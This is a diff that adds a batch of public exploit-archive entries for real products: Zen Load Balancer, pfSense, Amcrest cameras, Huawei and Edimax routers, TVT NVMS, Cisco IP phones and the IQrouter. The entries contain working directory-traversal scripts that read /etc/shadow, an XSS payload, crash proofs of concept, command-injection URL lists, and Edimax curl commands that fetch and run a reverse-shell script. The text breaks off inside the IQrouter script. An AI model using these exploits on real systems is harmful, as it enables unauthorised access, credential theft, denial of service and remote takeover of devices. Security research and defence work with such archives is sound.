diff --git a/exploits/cgi/webapps/48308.py b/exploits/cgi/webapps/48308.py new file mode 100755 index 000000000..5ce0b9588 --- /dev/null +++ b/exploits/cgi/webapps/48308.py @@ -0,0 +1,31 @@ +# Exploit Title: Zen Load Balancer 3.10.1 - 'index.cgi' Directory Traversal +# Date: 2020-04-10 +# Exploit Author: Basim Alabdullah +# Software Link: https://sourceforge.net/projects/zenloadbalancer/files/Distro/zenloadbalancer-distro_3.10.1.iso/download +# Version: 3.10.1 +# Tested on: Debian8u2 +# +# Technical Details: +# The filelog parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server. +# The payload ../../../../../../../../../../../../../../../../etc/shadow was submitted in the filelog parameter. The requested file was returned in the application's response. +# Note that disclosure of the shadow file may allow an attacker to discover users' passwords +# +# Impact: +# -------- +# Successful exploitation could allow an attacker to obtain sensitive +# information. + +import requests +import sys + +if len(sys.argv) <2: + print("Example Use: python exploit.py https://192.168.1.1:444 /etc/shadow") + sys.exit(-1) +else: + files=sys.argv[2] + url=sys.argv[1] + with requests.session() as s: + urlz=url+"/index.cgi?id=2-3&filelog=../../../../../../../../../../../../../../../../"+files+"&nlines=100&action=See+logs" + response = s.get(urlz, auth=('admin', 'admin'), verify=False) + txt=response.text + print(response.text) \ No newline at end of file diff --git a/exploits/cgi/webapps/48373.rb b/exploits/cgi/webapps/48373.rb new file mode 100755 index 000000000..5e00bbf82 --- /dev/null +++ b/exploits/cgi/webapps/48373.rb @@ -0,0 +1,83 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Auxiliary + include Msf::Auxiliary::Report + include Msf::Auxiliary::Scanner + include Msf::Exploit::Remote::HttpClient + + def initialize(info={}) + super(update_info(info, + 'Name' => "Zen Load Balancer Directory Traversal", + 'Description' => %q{ + This module exploits a authenticated directory traversal +vulnerability in Zen Load + Balancer `v3.10.1`. The flaw exists in 'index.cgi' not +properly handling 'filelog=' + parameter which allows a malicious actor to load arbitrary file path. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Basim Alabdullah', # Vulnerability discovery + 'Dhiraj Mishra' # Metasploit module + ], + 'References' => + [ + ['EDB', '48308'] + ], + 'DisclosureDate' => "Apr 10 2020" + )) + + register_options( + [ + Opt::RPORT(444), + OptBool.new('SSL', [true, 'Use SSL', true]), + OptInt.new('DEPTH', [true, 'The max traversal depth', 16]), + OptString.new('FILEPATH', [false, 'The name of the file to +download', '/etc/passwd']), + OptString.new('TARGETURI', [true, "The base URI path of the +ZenConsole install", '/']), + OptString.new('HttpUsername', [true, 'The username to use for +the HTTP server', 'admin']), + OptString.new('HttpPassword', [false, 'The password to use for +the HTTP server', 'admin']) + ]) + end + + def run_host(ip) + filename = datastore['FILEPATH'] + traversal = "../" * datastore['DEPTH'] + + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'index.cgi'), + 'vars_get'=> + { + 'id' => '2-3', + 'filelog' => "#{traversal}#{filename}", + 'nlines' => '100', + 'action' => 'See logs' + }, + 'authorization' => +basic_auth(datastore['HttpUsername'],datastore['HttpPassword']) + }, 25) + + unless res && res.code == 200 + print_error('Nothing was downloaded') + return + end + + print_good("#{peer} - Downloaded #{res.body.length} bytes") + path = store_loot( + 'zenload.http', + 'text/plain', + ip, + res.body, + filename + ) + print_good("File saved in: #{path}") + end +end \ No newline at end of file diff --git a/exploits/freebsd/webapps/48300.txt b/exploits/freebsd/webapps/48300.txt new file mode 100644 index 000000000..f485c9955 --- /dev/null +++ b/exploits/freebsd/webapps/48300.txt @@ -0,0 +1,39 @@ +# Exploit Title: pfSense 2.4.4-P3 - 'User Manager' Persistent Cross-Site Scripting +# Date: 2020-04-02 +# Exploit Author: Matthew Aberegg +# Vendor Homepage: https://www.pfsense.org +# Version: PfSense 2.4.4-P3 +# Tested on: FreeBSD 11.2-RELEASE-p10 +# CVE : CVE-2020-11457 + +# Vulnerability Details +# Description : A persistent cross-site scripting vulnerability exists within the 'User Manager' functionality of the pfSense administration panel. +# Vulnerable Parameter : descr + + +# POC +# Exploit Details : The following request will create a user in the 'User Manager' functionality with an XSS payload as the Full Name. +# This payload can be triggered by navigating to "https://TARGET/system_usermanager_addprivs.php?userid=0" where userid is +# the id of the user containing the payload. + + +POST /system_usermanager.php?act=new HTTP/1.1 +Host: TARGET +Connection: close +Content-Length: 410 +Cache-Control: max-age=0 +Origin: https://TARGET +Upgrade-Insecure-Requests: 1 +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 +Sec-Fetch-Dest: document +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: navigate +Sec-Fetch-User: ?1 +Referer: https://TARGET/system_usermanager.php?act=new +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: PHPSESSID=ebd302521a887cef99f517e3ac6bdd7d + +__csrf_magic=sid%3A3689bbf23a3350994d7543c082fc36d16397208d%2C1585881631&usernamefld=TEST&passwordfld1=password&passwordfld2=password&descr=%3Cimg+src%3D%2F+onerror%3Dalert%281%29%3E&expires=&webguicss=pfSense.css&webguifixedmenu=&webguihostnamemenu=&dashboardcolumns=2&name=&caref=5e643dcfd524e&keylen=2048&lifetime=3650&authorizedkeys=&ipsecpsk=&act=&userid=&privid=&certid=&utype=user&oldusername=&save=Save \ No newline at end of file diff --git a/exploits/hardware/webapps/48304.py b/exploits/hardware/webapps/48304.py new file mode 100755 index 000000000..b73eb9ca5 --- /dev/null +++ b/exploits/hardware/webapps/48304.py @@ -0,0 +1,153 @@ +# Exploit Title: Amcrest Dahua NVR Camera IP2M-841 - Denial of Service (PoC) +# Date: 2020-04-07 +# Exploit Author: Jacob Baines +# Vendor Homepage: https://amcrest.com/ +# Software Link: https://amcrest.com/firmwaredownloads +# Version: Many different versions due to number of Dahua/Amcrest/etc +# devices affected +# Tested on: Amcrest IP2M-841 2.420.AC00.18.R and AMDVTENL8-H5 +# 4.000.00AC000.0 +# CVE : CVE-2020-5735 +# Advisory: https://www.tenable.com/security/research/tra-2020-20 +# Amcrest & Dahua NVR/Camera Port 37777 Authenticated Crash + +import argparse +import hashlib +import socket +import struct +import sys +import md5 +import re + +## DDNS test functionality. Stack overflow via memcpy + +def recv_response(sock): + # minimum size is 32 bytes + header = sock.recv(32) + + # check we received enough data + if len(header) != 32: + print 'Invalid response. Too short' + return (False, '', '') + + # extract the payload length field + length_field = header[4:8] + payload_length = struct.unpack_from('I', length_field) + payload_length = payload_length[0] + + # uhm... lets be restrictive of accepted lengths + if payload_length < 0 or payload_length > 4096: + print 'Invalid response. Bad payload length' + return (False, header, '') + + if (payload_length == 0): + return (True, header, '') + + payload = sock.recv(payload_length) + if len(payload) != payload_length: + print 'Invalid response. Bad received length' + return (False, header, payload) + + return (True, header, payload) + +def sofia_hash(msg): + h = "" + m = hashlib.md5() + m.update(msg) + msg_md5 = m.digest() + for i in range(8): + n = (ord(msg_md5[2*i]) + ord(msg_md5[2*i+1])) % 0x3e + if n > 9: + if n > 35: + n += 61 + else: + n += 55 + else: + n += 0x30 + h += chr(n) + return h + +top_parser = argparse.ArgumentParser(description='lol') +top_parser.add_argument('-i', '--ip', action="store", dest="ip", +required=True, help="The IPv4 address to connect to") +top_parser.add_argument('-p', '--port', action="store", dest="port", +type=int, help="The port to connect to", default="37777") +top_parser.add_argument('-u', '--username', action="store", +dest="username", help="The user to login as", default="admin") +top_parser.add_argument('--pass', action="store", dest="password", +required=True, help="The password to use") +args = top_parser.parse_args() + +sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +print "[+] Attempting connection to " + args.ip + ":" + str(args.port) +sock.connect((args.ip, args.port)) +print "[+] Connected!" + +# send the old style login request. We'll use blank hashes. This should +# trigger a challenge from new versions of the camera +old_login = ("\xa0\x05\x00\x60\x00\x00\x00\x00" + + "\x00\x00\x00\x00\x00\x00\x00\x00" + # username hash + "\x00\x00\x00\x00\x00\x00\x00\x00" + # password hash + "\x05\x02\x00\x01\x00\x00\xa1\xaa") +sock.sendall(old_login) +(success, header, challenge) = recv_response(sock) +if success == False or not challenge: + print 'Failed to receive the challenge' + print challenge + sys.exit(0) + +# extract the realm and random seed +seeds = re.search("Realm:(Login to [A-Za-z0-9]+)\r\nRandom:([0-9]+)\r\n", +challenge) +if seeds == None: + print 'Failed to extract realm and random seed.' + print challenge + sys.exit(0) + +realm = seeds.group(1) +random = seeds.group(2) + +# compute the response +realm_hash = md5.new(args.username + ":" + realm + ":" + +args.password).hexdigest().upper() +random_hash = md5.new(args.username + ":" + random + ":" + +realm_hash).hexdigest().upper() +sofia_result = sofia_hash(args.password) +final_hash = md5.new(args.username + ":" + random + ":" + +sofia_result).hexdigest().upper() + +challenge_resp = ("\xa0\x05\x00\x60\x47\x00\x00\x00" + + "\x00\x00\x00\x00\x00\x00\x00\x00" + + "\x00\x00\x00\x00\x00\x00\x00\x00" + + "\x05\x02\x00\x08\x00\x00\xa1\xaa" + + args.username + "&&" + random_hash + final_hash) +sock.sendall(challenge_resp) + +(success, header, payload) = recv_response(sock) +if success == False or not header: + print 'Failed to receive the session id' + sys.exit(0) + +session_id_bin = header[16:20] +session_id_int = struct.unpack_from('I', session_id_bin) +if session_id_int[0] == 0: + print "Log in failed." + sys.exit(0) + +session_id = session_id_int[0] +print "[+] Session ID: " + str(session_id) + +# firmware version +command = "Protocol: " + ("a" * 0x300) + "\r\n" +command_length = struct.pack("I", len(command)) +firmware = ("\x62\x00\x00\x00" + command_length + + "\x04\x00\x00\x00\x00\x00\x00\x00" + + "\x00\x00\x00\x00\x00\x00\x00\x00" + + "\x00\x00\x00\x00\x00\x00\x00\x00" + + command) +sock.sendall(firmware) +(success, header, firmware_string) = recv_response(sock) +if success == False and not header: + print "[!] Probably crashed the server." +else: + print "[+] Attack failed." \ No newline at end of file diff --git a/exploits/hardware/webapps/48310.txt b/exploits/hardware/webapps/48310.txt new file mode 100644 index 000000000..61e7d2b48 --- /dev/null +++ b/exploits/hardware/webapps/48310.txt @@ -0,0 +1,51 @@ +# Title: Huawei HG630 2 Router - Authentication Bypass +# Date: 2020-04-13 +# Author: Eslam Medhat +# Vendor Homepage: www.huawei.com +# Version: HG630 V2 +# HardwareVersion: VER.B +# CVE: N/A + +#POC: + +The default password of this router is the last 8 characters of the +device's serial number which exist in the back of the device. + +An attacker can leak the serial number via the web app API like the +following: + +************************Request************************ +GET /api/system/deviceinfo HTTP/1.1 +Host: 192.168.1.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) +Gecko/20100101 Firefox/65.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: https://192.168.1.1/ +X-Requested-With: XMLHttpRequest +Connection: close +Cookie: +SessionID_R3=0PVHKCwY01etBMntI9TZZRvYX04emsjws0Be4EQ8VcoojhWaRQpOV9E0BbAktJDwzI0au6s1xgl0Cn7bvN9rejjMhJCI1t07f2XDnbo09tjN4mcG0XMyXbMoJLjViHm + + +************************Response************************ +HTTP/1.1 200 OK +Cache-Control: no-cache, no-store, max-age=0, must-revalidate +X-Download-Options: noopen +X-Frame-Options: SAMEORIGIN +X-XSS-Protection: 1; mode=block +Date: Fri, 01 Jan 2010 09:14:47 GMT +Connection: Keep-Alive +Content-Language: en +Content-Type: application/javascript +Content-Length: 141 + +while(1); /*{"DeviceName":"HG630 +V2","SerialNumber":"T5D7S18815905395","ManufacturerOUI":"00E0FC","UpTime":33288,"HardwareVersion":"VER.B"}*/ + + +You can use that serial number to login to the router. + +#Reference: +https://www.youtube.com/watch?v=vOrIL7L_cVc \ No newline at end of file diff --git a/exploits/hardware/webapps/48311.py b/exploits/hardware/webapps/48311.py new file mode 100755 index 000000000..18243acd7 --- /dev/null +++ b/exploits/hardware/webapps/48311.py @@ -0,0 +1,43 @@ +# Exploit Title: TVT NVMS 1000 - Directory Traversal +# Date: 2020-04-13 +# Exploit Author: Mohin Paramasivam (Shad0wQu35t) +# Vendor Homepage: http://en.tvt.net.cn/ +# Version : N/A +# Software Link : http://en.tvt.net.cn/products/188.html +# Original Author : Numan Türle +# CVE : CVE-2019-20085 + +import sys +import requests +import os +import time + +if len(sys.argv) !=4: + print " " + print "Usage : python exploit.py url filename outputname" + print "Example : python exploit.py http://10.10.10.10/ windows/win.ini win.ini" + print " " +else: + + + traversal = "../../../../../../../../../../../../../" + filename = sys.argv[2] + url = sys.argv[1]+traversal+filename + outputname = sys.argv[3] + content = requests.get(url) + + if content.status_code == 200: + + print " " + print "Directory Traversal Succeeded" + time.sleep(3) + print " " + print "Saving Output" + os.system("touch " + outputname) + output_write = open(outputname,"r+") + output_write.write(content.text) + output_write.close() + + else: + + print "Host not vulnerable to Directory Traversal!" \ No newline at end of file diff --git a/exploits/hardware/webapps/48318.txt b/exploits/hardware/webapps/48318.txt new file mode 100644 index 000000000..c9731d595 --- /dev/null +++ b/exploits/hardware/webapps/48318.txt @@ -0,0 +1,42 @@ +# Exploit Title: Edimax Technology EW-7438RPn-v3 Mini 1.27 - Remote Code Execution +# Date: 2020-04-13 +# Exploit Author: Wadeek +# Hardware Version: EW-7438RPn-v3 Mini +# Firmware Version: 1.23 / 1.27 +# Vendor Homepage: https://www.edimax.com/edimax/merchandise/merchandise_detail/data/edimax/global/wi-fi_range_extenders_n300/ew-7438rpn_mini/ +# Firmware Link: https://www.edimax.com/edimax/mw/cufiles/files/download/Firmware/EW-7438RPn_mini_1.27.zip + +== Shodan Dorks == + +(Setup Mode) "HTTP/1.0 302 Redirect" "Server: Boa/0.94.14rc21" "http://(null)/index.asp" +(Unsetup Mode) "HTTP/1.1 401 Unauthorized" "Server: Boa/0.94.14rc21" "Default Name:admin Password:1234" + +== Unauthorized Access - Wi-Fi Password Disclosure (Unsetup Mode) == + +GET /wizard_reboot.asp +showSSID = ""; +document.write(''+""+''); + +== Command Execution * == + +(Setup Mode) +curl 'http:///goform/mp' --data 'command=%7C%7C+busybox+wget+-O+-+http%3A%2F%2F%2Fdelivery.sh+%7C+%2Fbin%2Fsh' + +(Unsetup Mode with default password) +curl 'http:///goform/mp' -H 'Authorization: Basic YWRtaW46MTIzNA==' --data 'command=%7C%7C+busybox+wget+-O+-+http%3A%2F%2F%2Fdelivery.sh+%7C+%2Fbin%2Fsh' + +== Cross-Site Request Forgery -> Command Execution * == + +
+ + +
+ +* [ delivery.sh ] +-------------------------------------------------------------------------------------- +# (msfvenom) linux/mipsbe/shell/reverse_tcp +cd /tmp/ +busybox wget -O reverse http:///reverse +busybox chmod +x reverse +./reverse & +-------------------------------------------------------------------------------------- \ No newline at end of file diff --git a/exploits/hardware/webapps/48342.txt b/exploits/hardware/webapps/48342.txt new file mode 100644 index 000000000..b143e957d --- /dev/null +++ b/exploits/hardware/webapps/48342.txt @@ -0,0 +1,13 @@ +# Exploit Title: Cisco IP Phone 11.7 - Denial of Service (PoC) +# Date: 2020-04-15 +# Exploit Author: Jacob Baines +# Vendor Homepage: https://www.cisco.com +# Software Link: https://www.cisco.com/c/en/us/products/collaboration-endpoints/ip-phones/index.html +# Version: Before 11.7(1) +# Tested on: Cisco Wireless IP Phone 8821 +# CVE: CVE-2020-3161 +# Cisco Advisory: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-voip-phones-rce-dos-rB6EeRXs +# Researcher Advisory: https://www.tenable.com/security/research/tra-2020-24 + +curl -v --path-as-is --insecure +https://phone_address/deviceconfig/setActivationCode?params=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa \ No newline at end of file diff --git a/exploits/hardware/webapps/48358.py b/exploits/hardware/webapps/48358.py new file mode 100755 index 000000000..dc5fb38ab --- /dev/null +++ b/exploits/hardware/webapps/48358.py @@ -0,0 +1,339 @@ +# Exploit Title: IQrouter 3.3.1 Firmware - Remote Code Execution +# Date: 2020-04-21 +# Exploit Author: drakylar +# Vendor Homepage: https://evenroute.com/ +# Software Link: https://evenroute.com/iqrouter +# Version: IQrouter firmware up to 3.3.1 +# Tested on: IQrouter firmware 3.3.1 +# CVE : N/A + +#!/usr/bin/env python3 +import argparse +from sys import argv, exit + +try: + import requests +except ImportError: + print("Install requests lib! pip3 install requests") + + +print(""" +####################################################################### +# IQrouter multiple RCE and other vulnerabilities # +# by drakylar (Shaposhnikov Ilya) # +# CVE-2020-11963 CVE-2020-11964 CVE-2020-11966 # +# CVE-2020-11967 CVE-2020-11968 # +####################################################################### +""") + + +rce_setup = [ + [ + "/cgi-bin/luci/er/vlanTag?vlan_tag='`{}`'", + "RCE /vlanTag (vlan_tag param)" + ], + [ + "/cgi-bin/luci/er/verify_wifi?wifi_conflict='`{}`'", + "RCE /verify_wifi (wifi_conflict param). Need hide_wifi_config != true" + ], + [ + "/cgi-bin/luci/er/screen9?save_creds=1&s1&s2='`{}`'&p1&p2", + "RCE /screen9 (s2 param)" + ], + [ + "/cgi-bin/luci/er/screen9?save_creds=1&s1='`{}`'&s2&p1&p2", + "RCE /screen9 (s1 param)" + ], + [ + "/cgi-bin/luci/er/screen9?save_creds=1&s1&s2&p1&p2='`{}`'", + "RCE /screen9 (p2 param)" + ], + [ + "/cgi-bin/luci/er/screen9?save_creds=1&s1&s2&p1='`{}`'&p2", + "RCE /screen9 (p1 param)" + ], + [ + "/cgi-bin/luci/er/screen4?save_isp='`{}`", + "RCE /screen4 (save_isp param)" + ], + [ + "/cgi-bin/luci/er/screen2?set_wan_modem_interfaces='`{}`'", + "RCE /screen2 set_wan_modem_interfaces param)" + ], + [ + "/cgi-bin/luci/er/screen2?find_ip_address_conflict='`{}`'", + "RCE /screen2 find_ip_address_conflict param)" + ], + [ + "/cgi-bin/luci/er/screen10?set_security_question='`{}`'", + "RCE /screen10 (set_security_question param)" + ], + [ + "/cgi-bin/luci/er/screen10?set_security_answer='`{}`'&set_security_question=1", + "RCE /screen10 (set_security_answer param)"], + [ + "/cgi-bin/luci/er/screen1?zonename='`{}`'", + "RCE /screen1 (zonename param)" + ], + [ + "/cgi-bin/luci/er/register?email=`{}`", + "RCE /register (email param, result in /cgi-bin/luci/er/get_syslog for result)" + ] +] + +rce_any = [ + [ + "/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=1&s2='`{}`'&p1=1&p2=1", + "RCE /wifi (s2 param)" + ], + [ + "/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1='`{}`'&s2=5&p1=6&p2=7", + "RCE /wifi (s1 param)" + ], + [ + "/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=1&s2=2&p1=3&p2='`{}`'", + "RCE /wifi (p2 param)" + ], + [ + "/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=1&s2=2&p1='`{}`'&p2=4", + "RCE /wifi (p1 param)" + ], + [ + "/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=`{}`&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=4&s2=5&p1=6&p2=7", + "RCE /wifi (guestwifi_5g_ssid param)" + ], + [ + "/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=`{}`&guestwifi_5g_ssid=3&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=4&s2=5&p1=6&p2=7", + "RCE /wifi (guestwifi_2g_ssid param)" + ], + [ + "/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key='`{}`'&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=2&guestwifi_5g_ssid=3&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=4&s2=5&p1=6&p2=7", + "RCE /wifi (guest_key param)" + ], + [ + "/cgi-bin/luci/er/wifi?enable_guestwifi='`{}`'&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=5&s2=6&p1=6&p2=7", + "RCE /wifi (enable_guestwifi param)" + ], + [ + "/cgi-bin/luci/er/screen11.1?email=`{}`®ister=123&uilog=123&bg=123", + "RCE /screen11.1 (email param)" + ], + [ + "/cgi-bin/luci/er/reboot_link?link='`{}`'", + "RCE /reboot_link (link param)" + ], + [ + "/cgi-bin/luci/er/diag_wifi/1/2/3/4/5/'`{}`'/", + "RCE /diag_wifi (htm5ghz param)" + ], + [ + "/cgi-bin/luci/er/diag_wifi/1/2/3/4/'`{}`'/6/", + "RCE /diag_wifi (htm2ghz param)" + ], + [ + "/cgi-bin/luci/er/diag_wifi/1/2/3/'`{}`'/5/6/", + "RCE /diag_wifi (c5ghz param)" + ], + [ + "/cgi-bin/luci/er/diag_wifi/1/2/'`{}`'/4/5/6/", + "RCE /diag_wifi (c2ghz param)" + ], + [ + "/cgi-bin/luci/er/diag_set_static_wan/'`{}`'/2/3/4/", + "RCE /diag_set_static_wan (static_ip param)" + ], + [ + "/cgi-bin/luci/er/diag_set_static_wan/1/'`{}`'/3/4/", + "RCE /diag_set_static_wan (net_mask param)" + ], + [ + "/cgi-bin/luci/er/diag_set_static_wan/1/2/'`{}`'/4/", + "RCE /diag_set_static_wan (gateway param)" + ], + [ + "/cgi-bin/luci/er/diag_set_static_wan/1/2/3/'`{}`'/", + "RCE /diag_set_static_wan (dns param)" + ], + [ + "/cgi-bin/luci/er/diag_set_static_modem/'`{}`'/2/3/", + "RCE /diag_set_static_modem (static_ip param)" + ], + [ + "/cgi-bin/luci/er/diag_set_static_modem/1/'`{}`'/3/", + "RCE /diag_set_static_modem (net_mask param)" + ], + [ + "/cgi-bin/luci/er/diag_set_static_modem/1/2/'`{}`'/", + "RCE /diag_set_static_modem (gateway param)" + ], + [ + "/cgi-bin/luci/er/diag_set_device_name_and_sync/'`{}`'/", + "RCE /diag_set_device_name_and_sync (device_name param)" + ], + [ + "/cgi-bin/luci/er/diag_set_device_name/'`{}`'/", + "RCE /diag_set_device_name (device_name param)" + ], + [ + "/cgi-bin/luci/er/diag_pppoe_update/'`{}`'/passs/", + "RCE /diag_pppoe_update (wan_username param)" + ], + [ + "/cgi-bin/luci/er/diag_pppoe_update/aaadmin/'`{}`'/", + "RCE /diag_pppoe_update (wan_password param)" + ], + [ + "/cgi-bin/luci/er/diag_pppoe/'`{}`'/passsswd/", + "RCE /diag_pppoe (wan_username param)" + ], + [ + "/cgi-bin/luci/er/diag_pppoe/aaadmin/'`{}`'/", + "RCE /diag_pppoe (wan_password param)" + ], + [ + "/cgi-bin/luci/er/diag_pppoa_update/'`{}`'/paaaasword/", + "RCE /diag_pppoa_update (wan_username param)" + ], + [ + "/cgi-bin/luci/er/diag_pppoa_update/aaadmin/'`{}`'/", + "RCE /diag_pppoa_update (wan_password param)" + ], + [ + "/cgi-bin/luci/er/diag_pppoa/'`{}`'/passs/", + "RCE /diag_pppoa (wan_username param)" + ], + [ + "/cgi-bin/luci/er/diag_pppoa/aaadmin/'`{}`'/", + "RCE /diag_pppoa (wan_password param)" + ], + [ + "/cgi-bin/luci/er/advanced_link?link='`{}`'", + "RCE /advanced_link (link param)" + ] + +] + +advanced_payloads = [ + [ + "/cgi-bin/luci/er/reboot_link?reboot=1", + "Reboot IQrouter (/reboot_link reboot param))" + ], + [ + "/cgi-bin/luci/er/screen2?reboot=1", + "Reboot IQrouter (/screen2 reboot param))" + ], + [ + "/cgi-bin/luci/er/index?reset_config=1", + "Reset IQrouter (/index reset_config param)" + ], + [ + "/cgi-bin/luci/er/screen7?upgrade=1", + "Upgrade IQrouter (/screen7 upgrade param)" + ], + [ + 